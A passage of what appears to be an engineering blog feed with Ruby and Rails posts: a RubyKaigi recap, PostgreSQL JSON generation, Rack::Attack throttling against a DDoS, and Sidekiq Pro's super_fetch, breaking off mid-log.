He also stressed the community aspect of the Ruby language and its importance in Ruby's success.</p><h3>ETL processing in Ruby using Kiba</h3><p><a href="https://twitter.com/thibaut_barrere">Thibaut Barrère</a> gave a talk on <a href="https://www.kiba-etl.org">Kiba</a> - a data processing ETL framework for Ruby. He discussed the design decisions that went into version 1 and how it evolved into the recently released version 2.</p><p>Kiba provides a programmatic API which can be used in background jobs instead of shelling out. It also has support for multistep batch processing.</p><p>Thibaut also explained how it can be used for data migration, reusing components, and big rewrites. He observed that performance has been gradually increasing with each Ruby release over the years.</p><p>The slides for this talk can be found <a href="https://speakerdeck.com/thbar/kiba-etl-v2-rubykaigi-2018">here</a>.</p><h3>Architecture of Hanami applications</h3><p>Next I attended a talk from <a href="https://twitter.com/anton_davydov">Anton Davydov</a> on architecture patterns in Hanami apps. He discussed the problems typical Rails applications face and how abstractions can address those issues. He explained how Hanami tries to achieve business logic isolation, avoidance of global state, sequential logic and test coverage. Functional callable objects, containers, dry-container, dry-inject and event sourcing are some of the abstractions that can be used in Hanami apps to help achieve this.</p><h3>Lightning talks</h3><p>The last session of the day was lightning talks.</p><p>The talk on <a href="https://github.com/godfat/rib">Rib</a> (a wordplay on IRB) was an interesting one. Rib is yet another interactive Ruby shell, but lightweight compared to IRB and pry. It has some nice features like auto indent, multiline history and filtering of callers.
It can also <code>beep</code> when the console starts, so you know it is time to get back to work.</p><p>I liked another talk where <a href="https://github.com/Watson1978">Watson</a> had worked on improving the performance of the JSON gem. He achieved this by using the CRuby API wherever applicable and avoiding heavy calls like <code>rb_funcall</code>. Check these two <a href="https://github.com/flori/json/pull/346/">pull</a> <a href="https://github.com/flori/json/pull/345">requests</a> for benchmarks and more discussion.</p><p>Apart from these talks, there were a lot of other talks which I could not attend. The <a href="http://rubykaigi.org/2018/presentations/DarkDimius.html#may31">Stripe team</a> is building a <a href="https://sorbet.run">type checker for Ruby</a> which looks very interesting and is extremely fast.</p><p><a href="http://rubykaigi.org/2018/presentations/bbatsov.html#may31">Bozhidar Batsov</a> gave a talk on the RuboCop project and how it has evolved over the years. There was also a talk on Karafka - event-driven architecture in Ruby. This talk was a good precursor to the Hanami talk, where event-driven architecture was mentioned again.</p><p><a href="http://rubykaigi.org/2018/schedule#may31">Other talks from day one</a> ranged from memory management, playing with Ruby syntax, code highlighting, deep learning and C extensions to Rubygems.</p><p>That's all for day one. Looking forward to day two already!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 adds allow_other_host to redirect_back method]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-allow_other_host-option-to-redirect_back-method"/>
      <updated>2018-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-allow_other_host-option-to-redirect_back-method</id>
      <content type="html"><![CDATA[<p>Rails 5.0 had introduced<a href="https://blog.bigbinary.com/2016/02/29/rails-5-improves-redirect_to_back-with-redirect-back.html">redirect_back</a>method to perform redirection to path present in <code>HTTP_REFERRER</code>. If there is no<code>HTTP_REFERRER</code> present, then site is redirected to <code>fallback_location</code>.</p><p>Now consider the following scenario.</p><p>In one of the searches on <code>google.com</code>, we see a link to <code>bigbinary.com</code>. Onclicking the link, we are navigated to <code>bigbinary.com</code>.</p><p>When somebody gets redirected to <code>bigbinary.com</code> from <code>google.com</code>, the HTTPREFERRER is set to <code>google.com</code></p><p>If <code>bigbinary.com</code> uses <code>redirect_back</code> in its code then the user will getredirected to <code>google.com</code> which might be undesired behavior for someapplications.</p><p>To avoid such cases, Rails 5.2 has added a flag<a href="https://github.com/rails/rails/pull/30850/commits/0db6a14ae16b143e078375ff7f3c940cf707290b">allow_other_host</a>to not allow redirecting to a different host other than the current site.</p><p>By default, <code>allow_other_host</code> option is set to <code>true</code>. So if you do not wantusers to go back to <code>google.com</code> then you need to explicitly set<code>allow_other_host: false</code>.</p><pre><code class="language-ruby">&gt; request.host#=&gt; &quot;http://www.bigbinary.com&quot;&gt; request.headers[&quot;Referrer&quot;]#=&gt; &quot;http://www.google.com&quot;# This will redirect back to google.comredirect_back(fallback_path: &quot;/&quot;)# This will not redirect back to google.comredirect_back(fallback_path: &quot;/&quot;, allow_other_host: false)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Faster JSON generation using PostgreSQL JSON function]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/generating-json-using-postgresql-json-function"/>
      <updated>2018-05-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/generating-json-using-postgresql-json-function</id>
      <content type="html"><![CDATA[<p>There are various ways to generate JSON in Rails. There is<a href="http://api.rubyonrails.org/classes/ActiveStorage/Filename.html#method-i-to_json">to_json</a>method built in Rails. We can also use<a href="https://github.com/rails/jbuilder">jbuilder gem</a> or<a href="https://github.com/rails-api/active_model_serializers">active model serializer gem</a>which can help us achieve the same.</p><p>As the number of records in the database grow, Rails can take a very long timeto generate a response. The bottleneck can generally be traced back to JSONgeneration.</p><p>Recently, in one of our applications, we faced this issue where a page wastaking too long to load. The load time was critical for us as this was the mostvisited page on the site. The page was loading a race, its racers and their lapdetails.</p><p>The page was loading fine for short races, with 10-15 racers and each racerhaving 30-50 laps. But for endurance races, with around 50-80 racers and eachracer having around 700-800 laps, we were hitting the bottleneck with loadtimes.</p><p>After benchmarking, JSON generation at the backend was found to be the culprit.</p><p>Looking out for solutions to fix the problem, we came across<a href="https://www.postgresql.org/docs/9.2/static/functions-json.html">PostgreSQL JSON functions</a>.</p><p><strong>PostgreSQL 9.2</strong> and above have built in support for generating JSON usingfunctions <code>row_to_json</code> and <code>array_to_json</code>. 
Let's look into both of them in detail.</p><h2>row_to_json</h2><p><code>row_to_json</code> returns each row as a JSON object.</p><pre><code class="language-pgsql">select row_to_json(laps) from laps;

{&quot;id&quot;:1, &quot;number&quot;:1, &quot;position&quot;:4, &quot;time&quot;:&quot;628.744&quot;, &quot;flag_type&quot;:&quot;Green&quot;}
...</code></pre><p>We could use a subquery to fetch only the attributes/columns which we require.</p><pre><code class="language-pgsql">select row_to_json(lap)
from (
  select id, number, position, time, flag_type from laps
) lap;

{&quot;id&quot;:1,&quot;number&quot;:1,&quot;position&quot;:4,&quot;time&quot;:&quot;628.744&quot;,&quot;flag_type&quot;:&quot;Green&quot;}
{&quot;id&quot;:2,&quot;number&quot;:2,&quot;position&quot;:4,&quot;time&quot;:&quot;614.424&quot;,&quot;flag_type&quot;:&quot;Green&quot;}
...</code></pre><h2>array_to_json</h2><p>To understand the <code>array_to_json</code> function, we must first look into <code>array_agg</code>. <code>array_agg</code> is an aggregate function. Aggregate functions compute a single result from a set of input values. <code>sum</code>, <code>min</code> and <code>max</code> are some other examples of aggregate functions. <code>array_agg</code> concatenates all the input values into a PostgreSQL array.</p><pre><code class="language-pgsql">select array_agg(lap)
from (
  select id, number, position, time, flag_type from laps
) lap;

{&quot;(1,1,4,\&quot;628.744\&quot;,\&quot;Green\&quot;)&quot;,&quot;(2,2,4,\&quot;614.424\&quot;,\&quot;Green\&quot;)&quot;, ...
}</code></pre><p>To convert this PostgreSQL array into JSON, we can use the <code>array_to_json</code> function.</p><pre><code class="language-pgsql">select array_to_json(array_agg(lap))
from (
  select id, number, position, time, flag_type from laps
) lap;

[{&quot;id&quot;:1, &quot;number&quot;:1, &quot;position&quot;:4, &quot;time&quot;:&quot;628.744&quot;, &quot;flag_type&quot;:&quot;Green&quot;}, ...]</code></pre><h2>A more complex example</h2><p>We can use the above two functions together to generate a custom JSON response.</p><pre><code class="language-pgsql">select row_to_json(u)
from (
  select first_name, last_name,
    (
      select array_to_json(array_agg(b))
      from (
        select number, position, time, flag_type
        from laps
        inner join racer_laps
        on laps.id = racer_laps.lap_id
        where racer_laps.racer_id = racers.id
      ) b
    ) as laps
  from racers
  where first_name = 'Jack'
) u;

{
  &quot;first_name&quot;: &quot;Jack&quot;,
  &quot;last_name&quot;: &quot;Altenwerth&quot;,
  &quot;laps&quot;: [
    {
      &quot;number&quot;: 1,
      &quot;position&quot;: 4,
      &quot;time&quot;: &quot;628.744&quot;,
      &quot;flag_type&quot;: &quot;Green&quot;
    },
    {
      &quot;number&quot;: 2,
      &quot;position&quot;: 4,
      &quot;time&quot;: &quot;614.424&quot;,
      &quot;flag_type&quot;: &quot;Green&quot;
    },
    ...
]
}</code></pre><h2>Using the functions in Rails</h2><p>We can use the above-mentioned functions in Rails as shown here.</p><pre><code class="language-ruby">query = &lt;&lt;~EOQ
  select row_to_json(u)
  from (
    select first_name, last_name,
      (
        select array_to_json(array_agg(b))
        from (
          select number, position, time, flag_type
          from laps
          inner join racer_laps
          on laps.id = racer_laps.lap_id
          where racer_laps.racer_id = racers.id
        ) b
      ) as laps
    from racers
    where first_name = 'Jack'
  ) u;
EOQ

generated_json = ActiveRecord::Base.connection.execute(query).values
puts generated_json

{
  &quot;first_name&quot;: &quot;Jack&quot;,
  &quot;last_name&quot;: &quot;Altenwerth&quot;,
  &quot;laps&quot;: [
    {
      &quot;number&quot;: 1,
      &quot;position&quot;: 4,
      &quot;time&quot;: &quot;628.744&quot;,
      &quot;flag_type&quot;: &quot;Green&quot;
    },
    {
      &quot;number&quot;: 2,
      &quot;position&quot;: 4,
      &quot;time&quot;: &quot;614.424&quot;,
      &quot;flag_type&quot;: &quot;Green&quot;
    },
    ...
  ]
}</code></pre><p>Although the code to generate JSON this way is more verbose and less readable compared to the other ways of generating JSON in Rails, it is more performant.</p><h2>Observations</h2><p>On the racers page, generating the JSON using the PostgreSQL functions gave us the following improvements.</p><p>For short races (10-15 racers, each racer having 30-50 laps), the average API response time decreased from <code>40ms</code> to <code>15ms</code>.</p><p>For endurance races (50-80 racers, each racer having around 700-800 laps), the average API response time decreased from <code>1200ms</code> to <code>20ms</code>.</p><h2>Conclusion</h2><p>Use the Rails way of generating JSON as long as you can. If performance starts to be an issue, then don't be afraid of using the features made available by the database.
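For contrast, here is a minimal plain-Ruby sketch of the per-row object building that Rails-side JSON generation has to do, and that the PostgreSQL functions push down into the database. The data here is hypothetical in-memory rows, not the app's actual models:

```ruby
require "json"

# Hypothetical in-memory rows standing in for the racers and laps tables.
racer = {
  first_name: "Jack",
  last_name: "Altenwerth",
  laps: [
    { number: 1, position: 4, time: "628.744", flag_type: "Green" },
    { number: 2, position: 4, time: "614.424", flag_type: "Green" }
  ]
}

# Rails-side generation allocates one Ruby hash per lap row before
# serializing; row_to_json/array_to_json build the JSON inside PostgreSQL,
# so with 700-800 laps per racer all of this allocation work disappears.
generated_json = JSON.generate(racer)
puts generated_json
```

With a handful of laps the difference is negligible; it is the hundreds of intermediate objects per racer in endurance races that made the database-side approach pay off.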
In this case we would be trading some code simplicity for performance. However, sometimes this trade-off is worth it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[APISnapshot built on Elm & Rails is open source]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/apisnapshot-built-using-elm-and-ruby-on-rails-is-open-source"/>
      <updated>2018-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/apisnapshot-built-using-elm-and-ruby-on-rails-is-open-source</id>
      <content type="html"><![CDATA[<p>APISnapshot (Link not available) is built using Elm and Ruby on Rails. Todaywere happy to announce that the code is publicly<a href="https://github.com/bigbinary/apisnapshot">available on GitHub</a>.</p><p>We built APISnapshot for two reasons.</p><p>We wanted to work with <a href="http://elm-lang.org">Elm</a>.</p><p>We wanted to have a tool that is easy to use and that will help us capture whatresponse we are getting from the API in a format that is easy to share in githubissue, in slack or in an email. As a consulting company we work with variousteams around the world and during development phase either API is unstable orthey do not do what they should be doing.</p><p>We originally built this tool using <a href="https://reactjs.org">React</a>. Elm compileris quite strict and forced us to take into consideration all possibilities. Thislead us to notice a few bugs which were still present in React code. In this wayElm compiler helped us produce &quot;correct&quot; software by eliminating some of thebugs that we would have found later.</p><p>JSON encoding/decoding is a hard problem in Elm in general. In most of the caseswe know the shape of the API response we are going to get.</p><p>In the case of APISnapshot we do not know the shape of the JSON response we willget. Because of that it took us a bit longer to build the application. However,this forced us to really dig deep into JSON encoding/decoding issue in Elm andwe learned a lot.</p><p>We would like to thank all the<a href="https://github.com/bigbinary/apisnapshot/graphs/contributors">contributors</a> tothe project. Special shout out goes to <a href="https://github.com/jasim">Jasim</a> for thediscussion and the initial work on parsing the JSON file.</p><p>We like the combination of Elm and Ruby on Rails so much so that we are building<a href="https://www.acehelp.com">AceHelp</a> using the same technologies. 
AceHelp is <a href="https://github.com/bigbinary/acehelp">open source</a> from day one.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Generating filmstrip using puppeteer for better debugging]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/generating-filmstrip-using-puppeteer-for-better-debugging"/>
      <updated>2018-05-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/generating-filmstrip-using-puppeteer-for-better-debugging</id>
      <content type="html"><![CDATA[<p>We are writing a lot of automation tests using<a href="https://github.com/GoogleChrome/puppeteer">Puppeteer</a>.</p><p>Since puppeteer scripts execute so fast certain tests fail when they should bepassing. Debugging those tests can be a challenge.</p><p>Chrome devtools comes with<a href="https://www.youtube.com/watch?v=r1LVAu1BB8Y">filmstrip feature</a>. In&quot;Performance&quot; tab we can see screenshots of the site as they change over time.</p><p>We wanted puppeteer to generate similar filmstrip so that we can visuallyidentify the source of the problem.</p><p>It turns out that puppeteer makes it very easy. Here is the full code.</p><pre><code class="language-javascript">import puppeteer from &quot;puppeteer&quot;;(async () =&gt; {  const browser = await puppeteer.launch({ headless: false });  const page = await browser.newPage();  await page.setViewport({ width: 1280, height: 1024 });  await page.tracing.start({ path: &quot;trace.json&quot;, screenshots: true });  await page.goto(&quot;https://www.bigbinary.com&quot;);  await Promise.all([    page.waitForNavigation(),    page.click(&quot;#navbar &gt; ul &gt; li:nth-child(1) &gt; a&quot;),  ]);  await page.tracing.stop();  await browser.close();})();</code></pre><p>If we execute this script then it will generate a file called <code>trace.json</code>. Thisfile has images embedded in it which are base64 encoded.</p><p>To see the filmstrip drag the <code>trace.json</code> file to &quot;Performance&quot; tab in theChrome devtool. Here is a quick video explaining this.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/hZGTIyc3Xak&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 added lazy proc allocation for block parameters]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-added-lazy-proc-allocation-for-block-parameters"/>
      <updated>2018-05-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-added-lazy-proc-allocation-for-block-parameters</id>
      <content type="html"><![CDATA[<pre><code class="language-ruby">irb&gt; def greetirb&gt;   yieldirb&gt; end  =&gt; :greetirb&gt;irb&gt; def greet_with_welcome(&amp;block)irb&gt;   puts 'Welcome'irb&gt;   greet(&amp;block)irb&gt; end  =&gt; :greet_with_welcomeirb&gt; greet_with_welcome { p 'BigBinary' }Welcome&quot;BigBinary&quot;  =&gt; &quot;BigBinary&quot;</code></pre><p>In Ruby 2.4 when we pass a block to a method, which further passes to anothermethod, Ruby creates a new <code>Proc</code> object by the given block before passing thisproc to the another method.</p><p>This creates unnecessary objects even when the block parameter is not accessed.It also creates a chain of <code>Proc</code> objects when the block parameter is passedthrough various methods.</p><p>Proc creation is one a heavyweight operation because we need to store all localvariables (represented by Env objects in MRI internal) in the heap.</p><p>Ruby 2.5 introduced a lazy proc allocation. Ruby 2.5 will not create a Procobject when passing a block to another method. Instead, it will pass the blockinformation. If the block is accessed somewhere else, then it creates a <code>Proc</code>object by the given block.</p><p>This results in lesser memory allocation and faster execution.</p><h4>Ruby 2.4</h4><pre><code class="language-ruby">irb&gt; require 'benchmark'  =&gt; trueirb&gt; def greetirb&gt;   yieldirb&gt; end  =&gt; :greetirb&gt;irb&gt; def greet_with_welcome(&amp;block)irb&gt;   puts 'Welcome'irb&gt;   greet(&amp;block)irb&gt; end  =&gt; :greet_with_welcomeirb&gt;irb&gt; Benchmark.measure { 1000.times { greet_with_welcome { 'BigBinary' } } }WelcomeWelcome.........  
=&gt; #&lt;Benchmark::Tms:0x007fe6ab929de0 @label=&quot;&quot;, @real=0.022295999999187188, @cstime=0.0, @cutime=0.0, @stime=0.01, @utime=0.0, @total=0.01&gt;</code></pre><h4>Ruby 2.5</h4><pre><code class="language-ruby">irb&gt; require 'benchmark'
=&gt; true
irb&gt; def greet
irb&gt;   yield
irb&gt; end
=&gt; :greet
irb&gt;
irb&gt; def greet_with_welcome(&amp;block)
irb&gt;   puts 'Welcome'
irb&gt;   greet(&amp;block)
irb&gt; end
=&gt; :greet_with_welcome
irb&gt;
irb&gt; Benchmark.measure { 1000.times { greet_with_welcome { 'BigBinary' } } }
Welcome
Welcome
.........
=&gt; #&lt;Benchmark::Tms:0x00007fa4400871b8 @label=&quot;&quot;, @real=0.004612999997334555, @cstime=0.0, @cutime=0.0, @stime=0.001524000000000001, @utime=0.0030690000000000023, @total=0.004593000000000003&gt;</code></pre><p>As we can see, there is a considerable improvement in execution time when a block param is passed along in Ruby 2.5.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/5ee9513a71">commit</a> and the <a href="https://bugs.ruby-lang.org/issues/14045">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 fixes query caching in MySQL & PostgreSQL adapters]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-fixes-query-caching-in-mysql-and-postgresql-adapters"/>
      <updated>2018-05-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-fixes-query-caching-in-mysql-and-postgresql-adapters</id>
      <content type="html"><![CDATA[<p>Prior to Rails 5.2, MySQL and PostgreSQL adapters had their own <code>select_value</code>, <code>select_values</code> &amp; <code>select_rows</code> methods. These methods improved performance by not instantiating <code>ActiveRecord::Result</code>.</p><p>However, these methods broke query caching of the <code>ActiveRecord::FinderMethods#exists?</code> method. Let's check the issue.</p><pre><code class="language-ruby">&gt;&gt; User.cache do
&gt;&gt;   2.times { User.exists?(1) }
&gt;&gt; end
User Exists (2.1ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]
User Exists (2ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]</code></pre><p>As we can see, the query was not cached and the SQL was executed a second time.</p><p>From Rails 5.2, MySQL and PostgreSQL adapters <a href="https://github.com/rails/rails/pull/29454">no longer override the select_{value,values,rows} methods</a>, which fixes this query caching issue.</p><p>Also, the performance improvement provided by these methods was marginal and not a hotspot in Active Record, so this change was accepted.</p><p>Let's check query caching of <code>ActiveRecord::FinderMethods#exists?</code> after the change.</p><pre><code class="language-ruby">&gt;&gt; User.cache do
&gt;&gt;   2.times { User.exists?(1) }
&gt;&gt; end
User Exists (2.1ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]
CACHE User Exists (0.0ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]</code></pre><p>Now, the query is cached as expected.</p><p>This change has also been backported to Rails 5.1, starting with version 5.1.2.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to mitigate DDoS using Rack::Attack]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-mitigate-ddos-using-rack-attack"/>
      <updated>2018-05-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-mitigate-ddos-using-rack-attack</id>
      <content type="html"><![CDATA[<p>Recently, we faced a DDoS attack in one of our clients' projects. There were many requests from different IPs to the root and login paths, and we were running thrice the usual number of servers to keep the system alive.</p><p>We were using Cloudflare's HTTP proxy and it was doing a great job preventing malicious requests, but we wanted to check if we could avoid the loading/captcha pages which Cloudflare uses to filter requests. We came to the conclusion that we would be able to mitigate the ongoing attack if we could throttle requests by IP.</p><p>Cloudflare has an inbuilt <a href="https://www.cloudflare.com/rate-limiting/">Rate Limiting</a> feature to throttle requests, but it would be a little expensive in our case since Cloudflare charges by the number of good requests and it was a high traffic website. On further analysis, we found that throttling at the application level would be enough in that situation, and the <a href="https://github.com/kickstarter/rack-attack">Rack::Attack</a> gem helped us with that.</p><p>Rack::Attack is a Rack middleware from Kickstarter. It can be configured to throttle requests based on IP or any other parameter.</p><p>To use Rack::Attack, include the gem in the Gemfile.</p><pre><code class="language-ruby">gem &quot;rack-attack&quot;</code></pre><p>After <code>bundle install</code>, configure the middleware in <code>config/application.rb</code>:</p><pre><code class="language-ruby">config.middleware.use Rack::Attack</code></pre><p>Now we can create the initializer <code>config/initializers/rack_attack.rb</code> to configure Rack::Attack.</p><p>By default, Rack::Attack uses <code>Rails.cache</code> to store request information. 
In our case, we wanted a separate cache for <code>Rack::Attack</code> and it was configured as follows.</p><pre><code class="language-ruby">redis_client = Redis.connect(url: ENV[&quot;REDIS_URL&quot;])
Rack::Attack.cache.store = Rack::Attack::StoreProxy::RedisStoreProxy.new(redis_client)</code></pre><p>If the web server is behind a proxy like Cloudflare, we have to configure a method to fetch the correct <code>remote_ip</code> address. Otherwise, it would block based on the proxy's IP address, which would result in blocking a lot of legit requests.</p><pre><code class="language-ruby">class Rack::Attack
  class Request &lt; ::Rack::Request
    def remote_ip
      # Cloudflare stores remote IP in CF_CONNECTING_IP header
      @remote_ip ||= (env['HTTP_CF_CONNECTING_IP'] ||
                      env['action_dispatch.remote_ip'] ||
                      ip).to_s
    end
  end
end</code></pre><p>Requests can be throttled based on IP address or any other parameter. In the following example, we are setting a limit of 40 requests per minute per IP for the &quot;/&quot; path.</p><pre><code class="language-ruby">class Rack::Attack
  throttle(&quot;req/ip&quot;, :limit =&gt; 40, :period =&gt; 1.minute) do |req|
    req.remote_ip if req.path == &quot;/&quot;
  end
end</code></pre><p>The downside of this configuration is that after the 1 minute period, the attacker can launch another 40 requests/IP simultaneously and it would exert pressure on the servers. 
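</p><p>The fixed-window counting behind such a throttle can be modeled in isolation. The sketch below is a hypothetical stand-alone model, not Rack::Attack's actual implementation: one counter per discriminator and time window, where a fresh window means a fresh quota.</p>

```ruby
# Hypothetical minimal model of fixed-window throttling (not Rack::Attack's
# real internals): one counter per (discriminator, period window).
class TinyThrottle
  def initialize(limit:, period:)
    @limit = limit
    @period = period
    @counters = Hash.new(0) # stand-in for a cache store such as Redis
  end

  # Returns true when this request exceeds the limit for the current window.
  def throttled?(discriminator, now)
    key = [discriminator, now.to_i / @period]
    @counters[key] += 1
    @counters[key] > @limit
  end
end

throttle = TinyThrottle.new(limit: 40, period: 60)
41.times { throttle.throttled?("1.2.3.4", Time.at(0)) } # 41st call returns true
throttle.throttled?("1.2.3.4", Time.at(60))             # new window, so false again
```

<p>Once a window passes, its counter is forgotten, which is why a fresh burst is possible right after each period. 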
This can be solved using exponential backoff.</p><pre><code class="language-ruby">class Rack::Attack
  # Exponential backoff for all requests to &quot;/&quot; path
  #
  # Allows 240 requests/IP in ~8 minutes
  #        480 requests/IP in ~1 hour
  #        960 requests/IP in ~8 hours (~2,880 requests/day)
  (3..5).each do |level|
    throttle(&quot;req/ip/#{level}&quot;,
             :limit =&gt; (30 * (2 ** level)),
             :period =&gt; (0.9 * (8 ** level)).to_i.seconds) do |req|
      req.remote_ip if req.path == &quot;/&quot;
    end
  end
end</code></pre><p>If we want to turn off throttling for some IPs (e.g. health check services), then those IPs can be safelisted.</p><pre><code class="language-ruby">class Rack::Attack
  class Request &lt; ::Rack::Request
    def allowed_ip?
      allowed_ips = [&quot;127.0.0.1&quot;, &quot;::1&quot;]
      allowed_ips.include?(remote_ip)
    end
  end

  safelist('allow from localhost') do |req|
    req.allowed_ip?
  end
end</code></pre><p>We can log blocked requests separately, which is helpful for analyzing the attack.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('rack.attack') do |name, start, finish, request_id, req|
  if req.env[&quot;rack.attack.match_type&quot;] == :throttle
    request_headers = { &quot;CF-RAY&quot; =&gt; req.env[&quot;HTTP_CF_RAY&quot;],
                        &quot;X-Amzn-Trace-Id&quot; =&gt; req.env[&quot;HTTP_X_AMZN_TRACE_ID&quot;] }

    Rails.logger.info &quot;[Rack::Attack][Blocked]&quot; &lt;&lt;
                      &quot;remote_ip: \&quot;#{req.remote_ip}\&quot;,&quot; &lt;&lt;
                      &quot;path: \&quot;#{req.path}\&quot;, &quot; &lt;&lt;
                      &quot;headers: #{request_headers.inspect}&quot;
  end
end</code></pre><p>A sample initializer with these configurations can be downloaded from <a 
href="https://gist.githubusercontent.com/ershad/b7ff20bcf8304e76e09c5834cddadff5/raw/e458aba877a010c34f1843d2fb491b8c27711d63/rack_attack.rb">here</a>.</p><p>The application will now throttle requests and respond with an <code>HTTP 429 Too Many Requests</code> response for the throttled requests.</p><p>We now block a lot of malicious requests using Rack::Attack. Here's a graph with the <code>% of blocked requests</code> over a week.</p><p><img src="/blog_images/2018/how-to-mitigate-ddos-using-rack-attack/blocked_requests.png" alt="Blocked requests"></p><p>EDIT: Updated the post to add more context to the situation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Increase reliability using super_fetch of Sidekiq Pro]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/increase-reliability-of-background-job-processing-using-super_fetch-of-sidekiq-pro"/>
      <updated>2018-05-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/increase-reliability-of-background-job-processing-using-super_fetch-of-sidekiq-pro</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/mperham/sidekiq">Sidekiq</a> is a background job processing library for Ruby. Sidekiq offers three versions: OSS, Pro and Enterprise.</p><p>OSS is free and open source and has basic features. The Pro and Enterprise versions are closed source and paid, and thus come with more advanced features. To compare the list of features offered by each of these versions, please visit the <a href="https://sidekiq.org">Sidekiq website</a>.</p><p>Sidekiq Pro 3.4.0 <a href="https://github.com/mperham/sidekiq/blob/6e79f2a860ae558f2ed52b8917d2fede846c0a50/Pro-Changes.md#340">introduced</a> the <code>super_fetch</code> strategy to reliably fetch jobs from the queue in Redis.</p><p>In this post, we will discuss the benefits of using the <code>super_fetch</code> strategy.</p><h2>Problem</h2><p>The open source version of Sidekiq comes with the <code>basic_fetch</code> strategy. Let's look at an example to understand how it works.</p><p>Let's add Sidekiq to our <code>Gemfile</code> and run <code>bundle install</code> to install it.</p><pre><code class="language-ruby">gem 'sidekiq'</code></pre><p>Add the following Sidekiq worker in <code>app/workers/sleep_worker.rb</code>.</p><pre><code class="language-ruby">class SleepWorker
  include Sidekiq::Worker

  def perform(name)
    puts &quot;Started #{name}&quot;
    sleep 30
    puts &quot;Finished #{name}&quot;
  end
end</code></pre><p>This worker does nothing great but sleep for 30 seconds.</p><p>Let's open a Rails console and schedule this worker to run as a background job asynchronously.</p><pre><code class="language-ruby">&gt;&gt; require &quot;sidekiq/api&quot;
=&gt; true
&gt;&gt; Sidekiq::Queue.new.size
=&gt; 0
&gt;&gt; SleepWorker.perform_async(&quot;A&quot;)
=&gt; &quot;5d8bf898c36a60a1096cf4d3&quot;
&gt;&gt; Sidekiq::Queue.new.size
=&gt; 1</code></pre><p>As we can see, the queue now has 1 job scheduled to be processed.</p><p>Let's start Sidekiq in another terminal tab.</p><pre><code class="language-ruby">$ bundle exec sidekiq
40510 
TID-owu1swr1i INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-40510&quot;, :url=&gt;nil}
40510 TID-owu1swr1i INFO: Starting processing, hit Ctrl-C to stop
40510 TID-owu1tr5my SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: start
Started A</code></pre><p>As we can see, the job with ID <code>5d8bf898c36a60a1096cf4d3</code> was picked up by Sidekiq, which started processing it.</p><p>If we check the Sidekiq queue size in the Rails console, it will be zero now.</p><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size
=&gt; 0</code></pre><p>Let's shut down the Sidekiq process gracefully while Sidekiq is still in the middle of processing our scheduled job. Press either <code>Ctrl-C</code> or run the <code>kill -SIGINT &lt;PID&gt;</code> command.</p><pre><code class="language-ruby">$ kill -SIGINT 40510</code></pre><pre><code class="language-ruby">40510 TID-owu1swr1i INFO: Shutting down
40510 TID-owu1swr1i INFO: Terminating quiet workers
40510 TID-owu1x00rm INFO: Scheduler exiting...
40510 TID-owu1swr1i INFO: Pausing to allow workers to finish...
40510 TID-owu1swr1i WARN: Terminating 1 busy worker threads
40510 TID-owu1swr1i WARN: Work still in progress [#&lt;struct Sidekiq::BasicFetch::UnitOfWork queue=&quot;queue:default&quot;, job=&quot;{\&quot;class\&quot;:\&quot;SleepWorker\&quot;,\&quot;args\&quot;:[\&quot;A\&quot;],\&quot;retry\&quot;:true,\&quot;queue\&quot;:\&quot;default\&quot;,\&quot;jid\&quot;:\&quot;5d8bf898c36a60a1096cf4d3\&quot;,\&quot;created_at\&quot;:1525427293.956314,\&quot;enqueued_at\&quot;:1525427293.957355}&quot;&gt;]
